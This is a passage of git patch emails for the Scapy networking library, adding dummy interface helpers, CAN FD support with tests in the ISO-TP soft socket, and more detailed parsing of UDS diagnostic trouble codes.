+++++++++++++++++++++ scapy/config.py | 3 +-- scapy/interfaces.py | 2 +- scapy/supersocket.py | 28 +++++++++++++++++++++++++++- 4 files changed, 50 insertions(+), 4 deletions(-) diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 806e137029c..ecfeda2359f 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -28,7 +28,9 @@ # Typing imports from typing import ( + List, Optional, + Tuple, Union, ) @@ -155,6 +157,25 @@ def get_if_raw_addr6(iff): ) SIOCGIFHWADDR = 0 # mypy compat + # DUMMYS + def get_if_raw_addr(iff: Union[NetworkInterface, str]) -> bytes: + return b"\0\0\0\0" + + def get_if_raw_hwaddr(iff: Union[NetworkInterface, str]) -> Tuple[int, bytes]: + return -1, b"" + + def in6_getifaddr() -> List[Tuple[str, int, str]]: + return [] + + def read_nameservers() -> List[str]: + return [] + + def read_routes() -> List[str]: + return [] + + def read_routes6() -> List[str]: + return [] + if LINUX or BSD: conf.load_layers.append("tuntap") diff --git a/scapy/config.py b/scapy/config.py index 4ffc88324d7..3be0bfec4a7 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -648,8 +648,7 @@ def _set_conf_sockets(): conf.L2socket = _NotAvailableSocket conf.L2listen = _NotAvailableSocket else: - from scapy.supersocket import L3RawSocket - from scapy.layers.inet6 import L3RawSocket6 + from scapy.supersocket import L3RawSocket, L3RawSocket6 conf.L3socket = L3RawSocket conf.L3socket6 = L3RawSocket6 # Reload the interfaces diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 10ec9577808..6a4b51822d2 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -66,7 +66,7 @@ def _l3socket(self, dev, ipv6): if LINUX and not self.libpcap and dev.name == conf.loopback_name: # handle the loopback case. see troubleshooting.rst if ipv6: - from scapy.layers.inet6 import L3RawSocket6 + from scapy.supersocket import L3RawSocket6 return cast(Type['scapy.supersocket.SuperSocket'], L3RawSocket6) else: from scapy.supersocket import L3RawSocket diff --git a/scapy/supersocket.py b/scapy/supersocket.py index eff4589cf55..8afec10b173 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -16,7 +16,13 @@ from scapy.config import conf from scapy.consts import DARWIN, WINDOWS -from scapy.data import MTU, ETH_P_IP, SOL_PACKET, SO_TIMESTAMPNS +from scapy.data import ( + MTU, + ETH_P_IP, + ETH_P_IPV6, + SOL_PACKET, + SO_TIMESTAMPNS, +) from scapy.compat import raw from scapy.error import warning, log_runtime from scapy.interfaces import network_name @@ -370,6 +376,26 @@ def send(self, x): log_runtime.error(msg) return 0 + class L3RawSocket6(L3RawSocket): + def __init__(self, + type: int = ETH_P_IPV6, + filter: Optional[str] = None, + iface: Optional[_GlobInterfaceType] = None, + promisc: Optional[bool] = None, + nofilter: bool = False) -> None: + # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 + self.outs = socket.socket( + socket.AF_INET6, + socket.SOCK_RAW, + socket.IPPROTO_RAW + ) + self.ins = socket.socket( + socket.AF_PACKET, + socket.SOCK_RAW, + socket.htons(type) + ) + self.iface = cast(_GlobInterfaceType, iface) + class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" From 4c620080bfe335e6cb7058d79dc4b983683594af Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 11 Sep 2023 17:27:40 +0200 Subject: [PATCH 1086/1632] Added support for CanFD in the ISOTPSoftSocket (#4048) * Added support for CanFD in the ISOTPSoftSocket * Code review. * Fixing mypy and removing an useless import in the test campaign * fix test * fix test * remove unnessesary test case file --------- Co-authored-by: bhonnef --- scapy/contrib/isotp/isotp_packet.py | 18 +- scapy/contrib/isotp/isotp_soft_socket.py | 57 ++++- test/contrib/isotp_soft_socket.uts | 289 ++++++++++++++++++++++- 3 files changed, 346 insertions(+), 18 deletions(-) diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 2eb8a6ff149..6f62614ca2b 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -16,7 +16,7 @@ BitEnumField, ByteField, XByteField, BitFieldLenField, StrField, \ FieldLenField, IntField, ShortField from scapy.compat import chb, orb -from scapy.layers.can import CAN +from scapy.layers.can import CAN, CAN_FD_MAX_DLEN as CAN_FD_MAX_DLEN from scapy.error import Scapy_Exception # Typing imports @@ -96,11 +96,21 @@ def fragment(self, *args, **kargs): """Helper function to fragment an ISOTP message into multiple CAN frames. + :param fd: type: Optional[bool]: will fragment the can frames + with size CAN_FD_MAX_DLEN + :return: A list of CAN frames """ - data_bytes_in_frame = 7 + + fd = kargs.pop("fd", False) + + def _get_data_len(): + # type: () -> int + return CAN_MAX_DLEN if not fd else CAN_FD_MAX_DLEN + + data_bytes_in_frame = _get_data_len() - 1 if self.rx_ext_address is not None: - data_bytes_in_frame = 6 + data_bytes_in_frame = data_bytes_in_frame - 1 if len(self.data) > ISOTP_MAX_DLEN_2015: raise Scapy_Exception("Too much data in ISOTP message") @@ -125,7 +135,7 @@ def fragment(self, *args, **kargs): frame_header = struct.pack(">HI", 0x1000, len(self.data)) if self.rx_ext_address: frame_header = struct.pack('B', self.rx_ext_address) + frame_header - idx = 8 - len(frame_header) + idx = _get_data_len() - len(frame_header) frame_data = self.data[0:idx] if self.rx_id is None or self.rx_id <= 0x7ff: frame = CAN(identifier=self.rx_id, data=frame_header + frame_data) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 52100b008d9..cc6be464d70 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -14,6 +14,7 @@ import socket from threading import Thread, Event, RLock +from bisect import bisect_left from scapy.packet import Packet from scapy.layers.can import CAN @@ -24,7 +25,7 @@ from scapy.utils import EDecimal from scapy.automaton import ObjectPipe, select_objects from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ - N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015 + N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015, CAN_FD_MAX_DLEN # Typing imports from typing import ( @@ -112,6 +113,7 @@ class ISOTPSoftSocket(SuperSocket): :param listen_only: Does not send Flow Control frames if a First Frame is received :param basecls: base class of the packets emitted by this socket + :param fd: enables the CanFD support for this socket """ # noqa: E501 def __init__(self, @@ -124,7 +126,8 @@ def __init__(self, stmin=0, # type: int padding=False, # type: bool listen_only=False, # type: bool - basecls=ISOTP # type: Type[Packet] + basecls=ISOTP, # type: Type[Packet] + fd=False # type: bool ): # type: (...) -> None @@ -138,6 +141,7 @@ def __init__(self, self.rx_ext_address = rx_ext_address or ext_address self.tx_id = tx_id self.rx_id = rx_id + self.fd = fd impl = ISOTPSocketImplementation( can_socket, @@ -148,7 +152,8 @@ def __init__(self, rx_ext_address=self.rx_ext_address, bs=bs, stmin=stmin, - listen_only=listen_only + listen_only=listen_only, + fd=fd ) # Cast for compatibility to functions from SuperSocket. @@ -486,7 +491,8 @@ def __init__(self, rx_ext_address=None, # type: Optional[int] bs=0, # type: int stmin=0, # type: int - listen_only=False # type: bool + listen_only=False, # type: bool + fd=False # type: bool ): # type: (...) -> None self.can_socket = can_socket @@ -496,6 +502,10 @@ def __init__(self, self.fc_timeout = 1 self.cf_timeout = 1 + self.fd = fd + + self.max_dlen = CAN_FD_MAX_DLEN if fd else CAN_MAX_DLEN + self.filter_warning_emitted = False self.closed = False @@ -553,8 +563,21 @@ def __del__(self): def can_send(self, load): # type: (bytes) -> None + def _get_padding_size(pl_size): + # type: (int) -> int + if not self.fd: + return CAN_MAX_DLEN + else: + fd_accepted_sizes = [0, 8, 12, 16, 20, 24, 32, 48, 64] + pos = bisect_left(fd_accepted_sizes, pl_size) + if pos == 0: + return fd_accepted_sizes[0] + if pos == len(fd_accepted_sizes): + return fd_accepted_sizes[-1] + return fd_accepted_sizes[pos] + if self.padding: - load += b"\xCC" * (CAN_MAX_DLEN - len(load)) + load += b"\xCC" * (_get_padding_size(len(load)) - len(load)) if self.tx_id is None or self.tx_id <= 0x7ff: self.can_socket.send(CAN(identifier=self.tx_id, data=load)) else: @@ -644,7 +667,7 @@ def _tx_timer_handler(self): elif self.tx_state == ISOTP_SENDING: # push out the next segmented pdu src_off = len(self.ea_hdr) - max_bytes = 7 - src_off + max_bytes = (self.max_dlen - 1) - src_off if self.tx_buf is None: self.tx_state = ISOTP_IDLE log_isotp.warning("TX buffer is not filled") @@ -783,10 +806,19 @@ def _recv_sf(self, data, ts): self.rx_state = ISOTP_IDLE length = data[0] & 0xf + is_fd_frame = self.fd and length == 0 and len(data) >= 2 + + if is_fd_frame: + length = data[1] + if len(data) - 1 < length: return - msg = data[1:1 + length] + msg = None + if is_fd_frame: + msg = data[2:2 + length] + else: + msg = data[1:1 + length] self.rx_queue.send((msg, ts)) def _recv_ff(self, data, ts): @@ -922,10 +954,15 @@ def begin_send(self, x): if length > ISOTP_MAX_DLEN_2015: log_isotp.warning("Too much data for ISOTP message") - if len(self.ea_hdr) + length <= 7: + sf_size_check = self.max_dlen - 1 + + if len(self.ea_hdr) + length + int(self.fd) <= sf_size_check: # send a single frame data = self.ea_hdr - data += struct.pack("B", length) + if not self.fd or length <= 7: + data += struct.pack("B", length) + else: + data += struct.pack("BB", 0, length) data += x self.tx_state = ISOTP_IDLE self.can_send(data) @@ -937,7 +974,7 @@ def begin_send(self, x): data += struct.pack(">HI", 0x1000, length) else: data += struct.pack(">H", 0x1000 | length) - load = x[0:8 - len(data)] + load = x[0:self.max_dlen - len(data)] data += load self.can_send(data) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index d60fc371927..de7f731b2e8 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -16,10 +16,7 @@ from test.testsocket import TestSocket, cleanup_testsockets import logging from scapy.error import log_runtime -try: - from cStringIO import StringIO # Python 2 -except ImportError: - from io import StringIO +from io import StringIO log_stream = StringIO() handler = logging.StreamHandler(log_stream) @@ -73,6 +70,28 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ msg = pkts[0] assert msg.data == dhex("01 02 03 04 05") += Single-frame receive FD + +with TestSocket(CANFD) as cans, TestSocket(CANFD) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241, fd=True) as s: + pl_sizes_testings = [1, 5, 7, 8, 15, 20, 35, 40, 46, 62] + data_str = "" + data_str_offset = 0 + cans.pair(stim) + for size_to_send in pl_sizes_testings: + if size_to_send > 7: + data_str = "00 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 6 + else: + data_str = "{} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 2 + stim.send(CANFD(identifier=0x241, data=dhex(data_str))) + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] + assert msg.data == dhex(data_str[data_str_offset:]) + = Single-frame send with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: @@ -85,6 +104,28 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ msg = pkts[0] assert msg.data == dhex("05 01 02 03 04 05") += Single-frame send FD + +with TestSocket(CANFD) as cans, TestSocket(CANFD) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241, fd=True) as s: + pl_sizes_testings = [1, 5, 7, 8, 15, 20, 35, 40, 46, 62] + data_str = "" + data_str_offset = 0 + cans.pair(stim) + for size_to_send in pl_sizes_testings: + if size_to_send > 7: + data_str = "00 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 6 + else: + data_str = "{} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 2 + s.send(ISOTP(dhex(data_str[data_str_offset:]))) + pkts = stim.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] + assert msg.data == dhex(data_str) + = Two frame receive with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: @@ -105,6 +146,26 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ assert msg.data == dhex("01 02 03 04 05 06 07 08 09") += Two frame receive FD + +with TestSocket(CANFD) as cans, TestSocket(CANFD) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241, fd=True) as s: + cans.pair(stim) + stim.send(CANFD(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06 07 08 09 0A 0B"))) + pkts = stim.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + c = pkts[0] + assert (c.data == dhex("30 00 00")) + stim.send(CANFD(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] + assert msg.data == dhex("01 02 03 04 05 06 07 08 09") + + = 20000 bytes receive def test(): @@ -145,6 +206,25 @@ def test(): test() += 20000 bytes send FD + +def testfd(): + with TestSocket(CANFD) as cans, TestSocket(CANFD) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241, fd=True) as s: + cans.pair(stim) + data = dhex("01 02 03 04 05")*4006 + msg = ISOTP(data, rx_id=0x641) + fragments = msg.fragment(fd=True) + ack = CANFD(identifier=0x241, data=dhex("30 00 00")) + ff = stim.sniff(timeout=1, count=1, + started_callback=lambda:s.send(msg)) + assert len(ff) == 1 + cfs = stim.sniff(timeout=20, count=len(fragments) - 1, + started_callback=lambda: stim.send(ack)) + for fragment, cf in zip(fragments, ff + cfs): + assert (bytes(fragment) == bytes(cf)) + +testfd() + = Close ISOTPSoftSocket with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: @@ -158,6 +238,22 @@ with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: msg, ts = s.ins.rx_queue.recv() assert msg == dhex("01 02 03 04 05") += Test on_recv function with single frame FD +with ISOTPSoftSocket(TestSocket(CANFD), tx_id=0x641, rx_id=0x241, fd=True) as s: + pl_sizes_testings = [1, 5, 7, 8, 15, 20, 35, 40, 46, 62] + data_str = "" + data_str_offset = 0 + for size_to_send in pl_sizes_testings: + if size_to_send > 7: + data_str = "00 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 6 + else: + data_str = "{} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 2 + s.ins.on_recv(CANFD(identifier=0x241, data=dhex(data_str))) + msg, ts = s.ins.rx_queue.recv() + assert msg == dhex(data_str[data_str_offset:]) + = Test on_recv function with empty frame with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=b"")) @@ -171,6 +267,25 @@ with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241, rx_ext_address=0 assert msg == dhex("01 02 03 04 05") assert ts == cf.time + += Test on_recv function with single frame and extended addressing FD +with ISOTPSoftSocket(TestSocket(CANFD), tx_id=0x641, rx_id=0x241, rx_ext_address=0xea, fd=True) as s: + pl_sizes_testings = [1, 5, 7, 8, 15, 20, 35, 40, 46, 62] + data_str = "" + data_str_offset = 0 + for size_to_send in pl_sizes_testings: + if size_to_send > 7: + data_str = "EA 00 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 8 + else: + data_str = "EA {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(size_to_send)])) + data_str_offset = 5 + cf = CANFD(identifier=0x241, data=dhex(data_str)) + s.ins.on_recv(cf) + msg, ts = s.ins.rx_queue.recv() + assert msg == dhex(data_str[data_str_offset:]) + assert ts == cf.time + = CF is sent when first frame is received cans = TestSocket(CAN) can_out = TestSocket(CAN) @@ -230,6 +345,19 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 assert can[0].identifier == 0x641 assert can[0].data == dhex("21 07 08") += Send two-frame ISOTP message, using send FD +with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, fd=True) as s, TestSocket(CANFD) as cans: + size_to_send = 100 + max_pl_size = 62 + data_str = "{}".format(" ".join(["%02X" % x for x in range(size_to_send)])) + cans.pair(isocan) + can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.send(dhex(data_str))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("10 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(max_pl_size)]))) + can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CANFD(identifier = 0x241, data=dhex("30 00 00")))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + = Send single frame ISOTP message with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s: cans.pair(isocan) @@ -284,6 +412,53 @@ thread.join(15) acks.close() assert not thread.is_alive() += Send two-frame ISOTP message FD + +acks = TestSocket(CANFD) + +acker_ready = threading.Event() +def acker(): + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + can = can_pkt[0] + acks.send(CANFD(identifier = 0x241, data=dhex("30 00 00"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, fd=True) as s, TestSocket(CANFD) as cans: + size_to_send = 123 + max_pl_size = 62 + data_str = "{}".format(" ".join(["%02X" % x for x in range(size_to_send)])) + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(dhex(data_str)) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("10 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(max_pl_size)]))) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x241 + assert can.data == dhex("30 00 00") + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + +thread.join(15) +acks.close() +assert not thread.is_alive() = Send two-frame ISOTP message with bs @@ -328,6 +503,51 @@ thread.join(15) acks.close() assert not thread.is_alive() += Send two-frame ISOTP message with bs FD + +acks = TestSocket(CANFD) +acker_ready = threading.Event() +def acker(): + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + acks.send(CANFD(identifier = 0x241, data=dhex("30 20 00"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, fd=True) as s, TestSocket(CANFD) as cans: + size_to_send = 124 + max_pl_size = 62 + data_str = "{}".format(" ".join(["%02X" % x for x in range(size_to_send)])) + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(ISOTP(data=dhex(data_str))) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("10 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(max_pl_size)]))) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x241 + assert can.data == dhex("30 20 00") + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + +thread.join(15) +acks.close() +assert not thread.is_alive() = Send two-frame ISOTP message with ST acks = TestSocket(CAN) @@ -371,6 +591,51 @@ thread.join(15) acks.close() assert not thread.is_alive() += Send two-frame ISOTP message with ST FD +acks = TestSocket(CANFD) +acker_ready = threading.Event() +def acker(): + acker_ready.set() + acks.sniff(timeout=1, count=1) + acks.send(CANFD(identifier = 0x241, data=dhex("30 00 10"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, fd=True) as s, TestSocket(CANFD) as cans: + size_to_send = 124 + max_pl_size = 62 + data_str = "{}".format(" ".join(["%02X" % x for x in range(size_to_send)])) + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(dhex(data_str)) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("10 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(max_pl_size)]))) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x241 + assert can.data == dhex("30 00 10") + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] + assert can.identifier == 0x641 + assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + +thread.join(15) +acks.close() +assert not thread.is_alive() + = Receive a single frame ISOTP message with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: @@ -867,6 +1132,22 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, padd res = pkts[0] assert res.length == 8 += Send a single frame ISOTP message with padding FD + +with TestSocket(CANFD) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, padding=True, fd=True) as s: + with TestSocket(CANFD) as cans: + cs1.pair(cans) + pl_sizes_testings = [1, 5, 7, 8, 9, 12, 15, 17, 20, 21, 27, 35, 40, 46, 50, 62] + pl_sizes_expected = [8, 8, 8, 12, 12, 16, 20, 20, 24, 24, 32, 48, 48, 48, 64, 64] + for i, pl_size in enumerate(pl_sizes_testings): + s.send(dhex(" ".join(["%02X" % x for x in range(pl_size)]))) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] + assert res.length == pl_sizes_expected[i] + = Send a two-frame ISOTP message with padding From 070a2621c9f2780670ffa72d20523bc1d3744d29 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 12 Sep 2023 13:40:08 +0200 Subject: [PATCH 1087/1632] UDS: more precise parsing of DTCs (#4094) --- scapy/contrib/automotive/uds.py | 90 +++++++++++++++++++++++++++------ test/contrib/automotive/uds.uts | 23 ++++++++- 2 files changed, 96 insertions(+), 17 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 74952f4d884..8b0dcf6f18f 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -16,7 +16,8 @@ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ ShortField, ObservableDict, XShortEnumField, XByteEnumField, StrLenField, \ - FieldLenField, XStrFixedLenField, XStrLenField + FieldLenField, XStrFixedLenField, XStrLenField, FlagsField, PacketListField, \ + PacketField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import log_loading @@ -956,12 +957,39 @@ class UDS_RDTCI(Packet): 20: 'reportDTCFaultDetectionCounter', 21: 'reportDTCWithPermanentStatus' } + dtcStatus = { + 1: 'TestFailed', + 2: 'TestFailedThisOperationCycle', + 4: 'PendingDTC', + 8: 'ConfirmedDTC', + 16: 'TestNotCompletedSinceLastClear', + 32: 'TestFailedSinceLastClear', + 64: 'TestNotCompletedThisOperationCycle', + 128: 'WarningIndicatorRequested' + } + dtcStatusMask = { + 1: 'ActiveDTCs', + 4: 'PendingDTCs', + 8: 'ConfirmedOrStoredDTCs', + 255: 'AllRecordDTCs' + } + dtcSeverityMask = { + # 0: 'NoSeverityInformation', + 1: 'NoClassInformation', + 2: 'WWH-OBDClassA', + 4: 'WWH-OBDClassB1', + 8: 'WWH-OBDClassB2', + 16: 'WWH-OBDClassC', + 32: 'MaintenanceRequired', + 64: 'CheckAtNextHalt', + 128: 'CheckImmediately' + } name = 'ReadDTCInformation' fields_desc = [ ByteEnumField('reportType', 0, reportTypes), - ConditionalField(ByteField('DTCSeverityMask', 0), + ConditionalField(FlagsField('DTCSeverityMask', 0, 8, dtcSeverityMask), lambda pkt: pkt.reportType in [0x07, 0x08]), - ConditionalField(XByteField('DTCStatusMask', 0), + ConditionalField(FlagsField('DTCStatusMask', 0, 8, dtcStatusMask), lambda pkt: pkt.reportType in [ 0x01, 0x02, 0x07, 0x08, 0x0f, 0x11, 0x12, 0x13]), ConditionalField(ByteField('DTCHighByte', 0), @@ -983,16 +1011,47 @@ class UDS_RDTCI(Packet): bind_layers(UDS, UDS_RDTCI, service=0x19) +class DTC(Packet): + name = 'Diagnostic Trouble Code' + fields_desc = [ + BitEnumField("system", 0, 2, { + 0: "Powertrain", + 1: "Chassis", + 2: "Body", + 3: "Network"}), + BitEnumField("type", 0, 2, { + 0: "Generic", + 1: "ManufacturerSpecific", + 2: "Generic", + 3: "Generic"}), + BitField("numeric_value_code", 0, 12), + ByteField("additional_information_code", 0), + ] + + def extract_padding(self, s): + return '', s + + +class DTC_Status(Packet): + name = 'DTC and status record' + fields_desc = [ + PacketField("dtc", None, pkt_cls=DTC), + FlagsField("status", 0, 8, UDS_RDTCI.dtcStatus) + ] + + def extract_padding(self, s): + return '', s + + class UDS_RDTCIPR(Packet): name = 'ReadDTCInformationPositiveResponse' fields_desc = [ ByteEnumField('reportType', 0, UDS_RDTCI.reportTypes), - ConditionalField(XByteField('DTCStatusAvailabilityMask', 0), - lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, - 0x12, 0x02, 0x0A, - 0x0B, 0x0C, 0x0D, - 0x0E, 0x0F, 0x13, - 0x15]), + ConditionalField( + FlagsField('DTCStatusAvailabilityMask', 0, 8, UDS_RDTCI.dtcStatus), + lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, 0x12, 0x02, 0x0A, + 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, + 0x15]), ConditionalField(ByteEnumField('DTCFormatIdentifier', 0, {0: 'ISO15031-6DTCFormat', 1: 'UDS-1DTCFormat', @@ -1003,7 +1062,8 @@ class UDS_RDTCIPR(Packet): ConditionalField(ShortField('DTCCount', 0), lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, 0x12]), - ConditionalField(StrField('DTCAndStatusRecord', b""), + ConditionalField(PacketListField('DTCAndStatusRecord', None, + pkt_cls=DTC_Status), lambda pkt: pkt.reportType in [0x02, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, 0x15]), @@ -1259,15 +1319,15 @@ def _contains_data_format_identifier(packet): fmt='B'), lambda p: p.modeOfOperation != 2), ConditionalField(StrLenField('maxNumberOfBlockLength', b"", - length_from=lambda p: p.lengthFormatIdentifier), + length_from=lambda p: p.lengthFormatIdentifier), lambda p: p.modeOfOperation != 2), ConditionalField(BitField('compressionMethod', 0, 4), lambda p: p.modeOfOperation != 0x02), ConditionalField(BitField('encryptingMethod', 0, 4), lambda p: p.modeOfOperation != 0x02), ConditionalField(FieldLenField('fileSizeOrDirInfoParameterLength', - None, - length_of='fileSizeUncompressedOrDirInfoLength'), + None, + length_of='fileSizeUncompressedOrDirInfoLength'), lambda p: p.modeOfOperation not in [1, 2, 3]), ConditionalField(StrLenField('fileSizeUncompressedOrDirInfoLength', b"", @@ -1275,8 +1335,8 @@ def _contains_data_format_identifier(packet): p.fileSizeOrDirInfoParameterLength), lambda p: p.modeOfOperation not in [1, 2, 3]), ConditionalField(StrLenField('fileSizeCompressed', b"", - length_from=lambda p: - p.fileSizeOrDirInfoParameterLength), + length_from=lambda p: + p.fileSizeOrDirInfoParameterLength), lambda p: p.modeOfOperation not in [1, 2, 3, 5]), ] diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index ead0097accb..ea3bb085530 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1046,6 +1046,20 @@ assert rdtcipr.DTCCount == 0xddaa assert rdtcipr.answers(rdtci) +rdtcipr1 = 